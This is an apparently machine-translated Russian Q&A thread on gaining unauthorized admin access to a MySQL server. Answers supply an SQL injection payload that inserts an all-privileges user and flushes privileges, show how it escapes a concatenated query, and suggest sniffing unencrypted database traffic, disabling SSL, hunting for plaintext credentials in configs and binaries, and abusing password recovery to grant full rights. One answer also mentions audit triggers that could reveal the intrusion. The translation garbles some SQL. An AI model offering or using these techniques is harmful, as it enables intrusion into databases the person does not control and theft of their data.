Внедрение учетной записи пользователя в mySQL

У вас есть доступ к рассматриваемому серверу MySQL?

Например, какой у вас доступ помимо обычного пользователя? Вы должны попытаться пройти по этим маршрутам, прежде чем «взломать» свой путь туда, поскольку это может или не может быть осуществимо с этим программным обеспечением.

Я полагаю, мне действительно не стоит отвечать на этот вопрос, но это слишком весело.

Посмотрите страницу Этот о SQL-инъекциях. Это должно удовлетворить ваши потребности. На странице Этот показано, как добавить учетные записи пользователей в mySQL.

Я бы попробовал ввести в случайные поля ввода пользователя следующее:

p'; INSERT INTO user VALUES

('localhost', 'myNewAdmin', ПАРОЛЬ ('some_pass'), Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y ',' Y ');

а потом

p'; FLUSH PRIVILEGES;

п'; предназначен для закрытия обычного вопроса. например - Нормальный вопрос:

"Select Adress from cusomers where custName = ' + $INPUT + ';

становится

    Select Adress from cusomers where custName = 'p'; INSERT INTO user 
VALUES('localhost','myNewAdmin',PASSWORD('some_pass'), 
'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'); 

Одна вещь, которая приходит в голову, - это обнюхивать обмен данными с базой данных и надеяться, что они не зашифрованы. Если он зашифрован, попробуйте изменить конфигурацию, чтобы не использовать SSL, и перезапустите mysql. Хороший сниффер, который я использую, - Wireshark

От документация mysql 5.0:

MySQL supports secure (encrypted) connections between MySQL clients and the server using the Secure Sockets Layer (SSL) protocol. This section discusses how to use SSL connections. It also describes a way to set up SSH on Windows. For information on how to require users to use SSL connections, see the discussion of the REQUIRE clause of the GRANT statement in Section 12.5.1.3, “GRANT Syntax”.

The standard configuration of MySQL is intended to be as fast as possible, so encrypted connections are not used by default. Doing so would make the client/server protocol much slower. Encrypting data is a CPU-intensive operation that requires the computer to do additional work and can delay other MySQL tasks. For applications that require the security provided by encrypted connections, the extra computation is warranted.

MySQL allows encryption to be enabled on a per-connection basis. You can choose a normal unencrypted connection or a secure encrypted SSL connection according the requirements of individual applications.

Secure connections are based on the OpenSSL API and are available through the MySQL C API. Replication uses the C API, so secure connections can be used between master and slave servers.

Вы, вероятно, уже сделали это, но все же попробуйте поискать в файлах конфигурации приложений. Если ничего нет - попробуйте поискать в исполняемых файлах / исходном коде - может быть, это в виде открытого текста, если вам повезет.

Скорее всего, на стороне базы данных есть триггеры, ведущие журнал, поэтому, когда вы взломаете базу данных, они будут знать, когда и как вы это сделали. Не хорошая идея.

Вы захотите использовать процесс восстановления пароля MySQL. Следуйте эти инструкции, за исключением замены запроса сброса пароля запросом добавить нового пользователя. Новый пользовательский запрос будет примерно таким:

GRANT ALL ON *.* TO 'myuser'@'localhost' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;

Это создаст нового пользователя myuser с паролем mypassword, который сможет войти в MySQL через CLI локальной системы. Затем вы можете использовать графический интерфейс администратора MySQL (Скачать здесь) и обновить разрешения пользователей, чтобы вы могли входить в систему из других систем в сети. Или используйте Заявление GRANT из интерфейса командной строки, если это вам больше нравится.